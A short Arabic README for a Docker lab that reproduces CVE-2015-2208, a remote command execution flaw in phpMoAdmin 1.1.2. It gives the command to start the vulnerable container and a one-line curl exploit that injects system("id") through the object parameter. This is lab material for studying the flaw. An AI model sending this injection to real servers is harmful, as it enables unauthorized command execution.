
محاكاة Docker لثغرة cve-2015-2208
#ملف Dockerfile لمحاكاة البيئة لـ CVE-2015-2208#
وظيفة saveObject في ملف moadmin.php في phpMoAdmin 1.1.2 تسمح للمهاجمين عن بعد بتنفيذ أوامر عشوائية عبر أحرف shell الخاصة في معامل object.
اكتشف بواسطة: @u0x (Pichaya Morimoto)، Xelenonz، pe3z، Pistachio
المراجع:
##بيئة الاختبار##
sudo docker run -d -p 8888:80 ptantiku/cve-2015-2208
##الاستغلال##
curl http://localhost:8888/moadmin.php -d 'object=1;system("id");'